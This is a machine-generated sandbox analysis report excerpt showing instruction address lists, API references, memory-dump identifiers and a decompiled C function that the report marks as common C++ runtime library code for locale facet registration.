0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d

APIs

__EH_prolog3.LIBCMT ref: 6E20F806
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F810
int.LIBCPMT ref: 6E20F827

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F861
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F881
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F89F

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
Instruction ID: 8688bbfb5126637dbdccf3455e9659dd8b3f6ee28c6a2945f365496b19e5a522
Opcode Fuzzy Hash: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
Instruction Fuzzy Hash: F1110A75D1052DCBCF01EBE0C894AEEB77BAF45B14F240904D4106B2D0DB749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t638 - 0x14, 0);
				_t609 =  *0x6e2c6df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6E1E161C(0x6e2c6d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6E2066BA(_t638 - 0x14);
					return E6E220075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6E211057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t638 - 0x20);
							E6E223D74(_t638 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t594, _t609, 0x14);
							E6E206653(_t638 - 0x14, 0);
							_t610 =  *0x6e2c6dc0; // 0x0
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6E1E161C(0x6e2c6d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6E2066BA(_t638 - 0x14);
								return E6E220075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6E2110BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t638 - 0x20);
										E6E223D74(_t638 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t451, _t595, _t610, 0x14);
										E6E206653(_t638 - 0x14, 0);
										_t611 =  *0x6e2c6df8; // 0x0
										 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
										 *(_t638 - 0x10) = _t611;
										_t235 = E6E1E161C(0x6e2c6da4);
										_t468 =  *((intOrPtr*)(_t638 + 8));
										_t596 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t235);
										__eflags = _t596;
										if(_t596 != 0) {
											L19:
											E6E2066BA(_t638 - 0x14);
											return E6E220075(_t596);
										} else {
											__eflags = _t611;
											if(_t611 == 0) {
												_push( *((intOrPtr*)(_t638 + 8)));
												_push(_t638 - 0x10);
												__eflags = E6E211127(_t451, _t468, __edx, _t596, _t611) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t638 - 0x20);
													E6E223D74(_t638 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t451, _t596, _t611, 0x14);
													E6E206653(_t638 - 0x14, 0);
													_t612 =  *0x6e2c6df4; // 0x0
													 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
													 *(_t638 - 0x10) = _t612;
													_t248 = E6E1E161C(0x6e2c6da0);
													_t475 =  *((intOrPtr*)(_t638 + 8));
													_t597 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t248);
													__eflags = _t597;
													if(_t597 != 0) {
														L26:
														E6E2066BA(_t638 - 0x14);
														return E6E220075(_t597);
													} else {
														__eflags = _t612;
														if(_t612 == 0) {
															_push( *((intOrPtr*)(_t638 + 8)));
															_push(_t638 - 0x10);
															__eflags = E6E2111AB(_t451, _t475, _t592, _t597, _t612) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t638 - 0x20);
																E6E223D74(_t638 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t451, _t597, _t612, 0x14);
																E6E206653(_t638 - 0x14, 0);
																_t613 =  *0x6e2c6dc8; // 0x0
																 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																 *(_t638 - 0x10) = _t613;
																_t261 = E6E1E161C(0x6e2c6d7c);
																_t482 =  *((intOrPtr*)(_t638 + 8));
																_t598 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t261);
																__eflags = _t598;
																if(_t598 != 0) {
																	L33:
																	E6E2066BA(_t638 - 0x14);
																	return E6E220075(_t598);
																} else {
																	__eflags = _t613;
																	if(_t613 == 0) {
																		_push( *((intOrPtr*)(_t638 + 8)));
																		_push(_t638 - 0x10);
																		__eflags = E6E211230(_t451, _t482, _t592, _t598, _t613) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t638 - 0x20);
																			E6E223D74(_t638 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t451, _t598, _t613, 0x14);
																			E6E206653(_t638 - 0x14, 0);
																			_t614 =  *0x6e2c6dc4; // 0x0
																			 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																			 *(_t638 - 0x10) = _t614;
																			_t274 = E6E1E161C(0x6e2c6d78);
																			_t489 =  *((intOrPtr*)(_t638 + 8));
																			_t599 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t274);
																			__eflags = _t599;
																			if(_t599 != 0) {
																				L40:
																				E6E2066BA(_t638 - 0x14);
																				return E6E220075(_t599);
																			} else {
																				__eflags = _t614;
																				if(_t614 == 0) {
																					_push( *((intOrPtr*)(_t638 + 8)));
																					_push(_t638 - 0x10);
																					__eflags = E6E2112B4(_t451, _t489, _t592, _t599, _t614) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t638 - 0x20);
																						E6E223D74(_t638 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t451, _t599, _t614, 0x14);
																						E6E206653(_t638 - 0x14, 0);
																						_t615 =  *0x6e2c6dd8; // 0x0
																						 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																						 *(_t638 - 0x10) = _t615;
																						_t287 = E6E1E161C(0x6e2c6d84);
																						_t496 =  *((intOrPtr*)(_t638 + 8));
																						_t600 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t287);
																						__eflags = _t600;
																						if(_t600 != 0) {
																							L47:
																							E6E2066BA(_t638 - 0x14);
																							return E6E220075(_t600);
																						} else {
																							__eflags = _t615;
																							if(_t615 == 0) {
																								_push( *((intOrPtr*)(_t638 + 8)));
																								_push(_t638 - 0x10);
																								__eflags = E6E211339(_t451, _t496, _t592, _t600, _t615) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t638 - 0x20);
																									E6E223D74(_t638 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t451, _t600, _t615, 0x14);
																									E6E206653(_t638 - 0x14, 0);
																									_t616 =  *0x6e2c6db0; // 0x0
																									 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																									 *(_t638 - 0x10) = _t616;
																									_t300 = E6E1E161C(0x6e2c6d64);
																									_t503 =  *((intOrPtr*)(_t638 + 8));
																									_t601 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t300);
																									__eflags = _t601;
																									if(_t601 != 0) {
																										L54:
																										E6E2066BA(_t638 - 0x14);
																										return E6E220075(_t601);
																									} else {
																										__eflags = _t616;
																										if(_t616 == 0) {
																											_push( *((intOrPtr*)(_t638 + 8)));
																											_push(_t638 - 0x10);
																											__eflags = E6E2113A1(_t451, _t503, _t592, _t601, _t616) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t638 - 0x20);
																												E6E223D74(_t638 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t451, _t601, _t616, 0x14);
																												E6E206653(_t638 - 0x14, 0);
																												_t617 =  *0x6e2c6ddc; // 0x0
																												 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																												 *(_t638 - 0x10) = _t617;
																												_t313 = E6E1E161C(0x6e2c6d88);
																												_t510 =  *((intOrPtr*)(_t638 + 8));
																												_t602 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t313);
																												__eflags = _t602;
																												if(_t602 != 0) {
																													L61:
																													E6E2066BA(_t638 - 0x14);
																													return E6E220075(_t602);
																												} else {
																													__eflags = _t617;
																													if(_t617 == 0) {
																														_push( *((intOrPtr*)(_t638 + 8)));
																														_push(_t638 - 0x10);
																														__eflags = E6E211409(_t451, _t510, _t592, _t602, _t617) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t638 - 0x20);
																															E6E223D74(_t638 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t451, _t602, _t617, 0x14);
																															E6E206653(_t638 - 0x14, 0);
																															_t618 =  *0x6e2c6de0; // 0x0
																															 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																															 *(_t638 - 0x10) = _t618;
																															_t326 = E6E1E161C(0x6e2c6d8c);
																															_t517 =  *((intOrPtr*)(_t638 + 8));
																															_t603 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t326);
																															__eflags = _t603;
																															if(_t603 != 0) {
																																L68:
																																E6E2066BA(_t638 - 0x14);
																																return E6E220075(_t603);
																															} else {
																																__eflags = _t618;
																																if(_t618 == 0) {
																																	_push( *((intOrPtr*)(_t638 + 8)));
																																	_push(_t638 - 0x10);
																																	__eflags = E6E211471(_t451, _t517, _t592, _t603, _t618) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t638 - 0x20);
																																		E6E223D74(_t638 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t451, _t603, _t618, 0x14);
																																		E6E206653(_t638 - 0x14, 0);
																																		_t619 =  *0x6e2c6dfc; // 0x0
																																		 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																		 *(_t638 - 0x10) = _t619;
																																		_t339 = E6E1E161C(0x6e2c6da8);
																																		_t524 =  *((intOrPtr*)(_t638 + 8));
																																		_t604 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t339);
																																		__eflags = _t604;
																																		if(_t604 != 0) {
																																			L75:
																																			E6E2066BA(_t638 - 0x14);
																																			return E6E220075(_t604);
																																		} else {
																																			__eflags = _t619;
																																			if(_t619 == 0) {
																																				_push( *((intOrPtr*)(_t638 + 8)));
																																				_push(_t638 - 0x10);
																																				__eflags = E6E2114EC(_t451, _t524, _t592, _t604, _t619) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t638 - 0x20);
																																					E6E223D74(_t638 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t451, _t604, _t619, 0x14);
																																					E6E206653(_t638 - 0x14, 0);
																																					_t620 =  *0x6e2c6dcc; // 0x0
																																					 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																					 *(_t638 - 0x10) = _t620;
																																					_t352 = E6E1E161C(0x6e2c6d80);
																																					_t531 =  *((intOrPtr*)(_t638 + 8));
																																					_t605 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t352);
																																					__eflags = _t605;
																																					if(_t605 != 0) {
																																						L82:
																																						E6E2066BA(_t638 - 0x14);
																																						return E6E220075(_t605);
																																					} else {
																																						__eflags = _t620;
																																						if(_t620 == 0) {
																																							_push( *((intOrPtr*)(_t638 + 8)));
																																							_push(_t638 - 0x10);
																																							__eflags = E6E211558(_t451, _t531, _t592, _t605, _t620) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t638 - 0x20);
																																								E6E223D74(_t638 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t451, _t605, _t620, 0x14);
																																								E6E206653(_t638 - 0x14, 0);
																																								_t621 =  *0x6e2c6e00; // 0x0
																																								 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																								 *(_t638 - 0x10) = _t621;
																																								_t365 = E6E1E161C(0x6e2c6dac);
																																								_t538 =  *((intOrPtr*)(_t638 + 8));
																																								_t606 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t365);
																																								__eflags = _t606;
																																								if(_t606 != 0) {
																																									L89:
																																									E6E2066BA(_t638 - 0x14);
																																									return E6E220075(_t606);
																																								} else {
																																									__eflags = _t621;
																																									if(_t621 == 0) {
																																										_push( *((intOrPtr*)(_t638 + 8)));
																																										_push(_t638 - 0x10);
																																										__eflags = E6E2115C4(_t451, _t538, _t592, _t606, _t621) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t638 - 0x20);
																																											E6E223D74(_t638 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t451, _t606, _t621, 0x14);
																																											E6E206653(_t638 - 0x14, 0);
																																											_t622 =  *0x6e2c6dd0; // 0x0
																																											 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																											 *(_t638 - 0x10) = _t622;
																																											_t378 = E6E1E161C(0x6e2c6d60);
																																											_t545 =  *((intOrPtr*)(_t638 + 8));
																																											_t607 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t378);
																																											__eflags = _t607;
																																											if(_t607 != 0) {
																																												L96:
																																												E6E2066BA(_t638 - 0x14);
																																												return E6E220075(_t607);
																																											} else {
																																												__eflags = _t622;
																																												if(_t622 == 0) {
																																													_push( *((intOrPtr*)(_t638 + 8)));
																																													_push(_t638 - 0x10);
																																													__eflags = E6E21162A(_t451, _t545, _t592, _t607, _t622) - 0xffffffff;
																																													if(__eflags == 0) {
																																														_t549 = _t638 - 0x20;
																																														E6E1E1438(_t549);
																																														E6E223D74(_t638 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e26851f, _t451, _t607, _t622, 4);
																																														_t623 = _t549;
																																														 *(_t638 - 0x10) = _t623;
																																														 *((intOrPtr*)(_t623 + 4)) =  *((intOrPtr*)(_t638 + 0xc));
																																														_push( *((intOrPtr*)(_t638 + 0x14)));
																																														_t203 = _t638 - 4;
																																														 *_t203 =  *(_t638 - 4) & 0x00000000;
																																														__eflags =  *_t203;
																																														 *_t623 = 0x6e26c0c4;
																																														 *((char*)(_t623 + 0x28)) =  *((intOrPtr*)(_t638 + 0x10));
																																														E6E21542F(_t451, _t549, _t592, _t607, _t623,  *_t203);
																																														return E6E220075(_t623,  *((intOrPtr*)(_t638 + 8)));
																																													} else {
																																														_t607 =  *(_t638 - 0x10);
																																														 *(_t638 - 0x10) = _t607;
																																														 *(_t638 - 4) = 1;
																																														E6E206FD3(__eflags, _t607);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																														 *0x6e2c6dd0 = _t607;
																																														goto L96;
																																													}
																																												} else {
																																													_t607 = _t622;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t606 =  *(_t638 - 0x10);
																																											 *(_t638 - 0x10) = _t606;
																																											 *(_t638 - 4) = 1;
																																											E6E206FD3(__eflags, _t606);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																											 *0x6e2c6e00 = _t606;
																																											goto L89;
																																										}
																																									} else {
																																										_t606 = _t621;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t605 =  *(_t638 - 0x10);
																																								 *(_t638 - 0x10) = _t605;
																																								 *(_t638 - 4) = 1;
																																								E6E206FD3(__eflags, _t605);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																								 *0x6e2c6dcc = _t605;
																																								goto L82;
																																							}
																																						} else {
																																							_t605 = _t620;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t604 =  *(_t638 - 0x10);
																																					 *(_t638 - 0x10) = _t604;
																																					 *(_t638 - 4) = 1;
																																					E6E206FD3(__eflags, _t604);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																																					 *0x6e2c6dfc = _t604;
																																					goto L75;
																																				}
																																			} else {
																																				_t604 = _t619;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t603 =  *(_t638 - 0x10);
																																		 *(_t638 - 0x10) = _t603;
																																		 *(_t638 - 4) = 1;
																																		E6E206FD3(__eflags, _t603);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																																		 *0x6e2c6de0 = _t603;
																																		goto L68;
																																	}
																																} else {
																																	_t603 = _t618;
																																	goto L68;
																																}
																															}
																														} else {
																															_t602 =  *(_t638 - 0x10);
																															 *(_t638 - 0x10) = _t602;
																															 *(_t638 - 4) = 1;
																															E6E206FD3(__eflags, _t602);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																															 *0x6e2c6ddc = _t602;
																															goto L61;
																														}
																													} else {
																														_t602 = _t617;
																														goto L61;
																													}
																												}
																											} else {
																												_t601 =  *(_t638 - 0x10);
																												 *(_t638 - 0x10) = _t601;
																												 *(_t638 - 4) = 1;
																												E6E206FD3(__eflags, _t601);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																												 *0x6e2c6db0 = _t601;
																												goto L54;
																											}
																										} else {
																											_t601 = _t616;
																											goto L54;
																										}
																									}
																								} else {
																									_t600 =  *(_t638 - 0x10);
																									 *(_t638 - 0x10) = _t600;
																									 *(_t638 - 4) = 1;
																									E6E206FD3(__eflags, _t600);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																									 *0x6e2c6dd8 = _t600;
																									goto L47;
																								}
																							} else {
																								_t600 = _t615;
																								goto L47;
																							}
																						}
																					} else {
																						_t599 =  *(_t638 - 0x10);
																						 *(_t638 - 0x10) = _t599;
																						 *(_t638 - 4) = 1;
																						E6E206FD3(__eflags, _t599);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																						 *0x6e2c6dc4 = _t599;
																						goto L40;
																					}
																				} else {
																					_t599 = _t614;
																					goto L40;
																				}
																			}
																		} else {
																			_t598 =  *(_t638 - 0x10);
																			 *(_t638 - 0x10) = _t598;
																			 *(_t638 - 4) = 1;
																			E6E206FD3(__eflags, _t598);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
																			 *0x6e2c6dc8 = _t598;
																			goto L33;
																		}
																	} else {
																		_t598 = _t613;
																		goto L33;
																	}
																}
															} else {
																_t597 =  *(_t638 - 0x10);
																 *(_t638 - 0x10) = _t597;
																 *(_t638 - 4) = 1;
																E6E206FD3(__eflags, _t597);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
																 *0x6e2c6df4 = _t597;
																goto L26;
															}
														} else {
															_t597 = _t612;
															goto L26;
														}
													}
												} else {
													_t596 =  *(_t638 - 0x10);
													 *(_t638 - 0x10) = _t596;
													 *(_t638 - 4) = 1;
													E6E206FD3(__eflags, _t596);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
													 *0x6e2c6df8 = _t596;
													goto L19;
												}
											} else {
												_t596 = _t611;
												goto L19;
											}
										}
									} else {
										_t595 =  *(_t638 - 0x10);
										 *(_t638 - 0x10) = _t595;
										 *(_t638 - 4) = 1;
										E6E206FD3(__eflags, _t595);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
										 *0x6e2c6dc0 = _t595;
										goto L12;
									}
								} else {
									_t595 = _t610;
									goto L12;
								}
							}
						} else {
							_t594 =  *(_t638 - 0x10);
							 *(_t638 - 0x10) = _t594;
							 *(_t638 - 4) = 1;
							E6E206FD3(__eflags, _t594);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
							 *0x6e2c6df0 = _t594;
							goto L5;
						}
					} else {
						_t594 = _t609;
						goto L5;
					}
				}
			}

0x6e20f41b
0x6e20f41b
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f44c
0x6e20f451
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
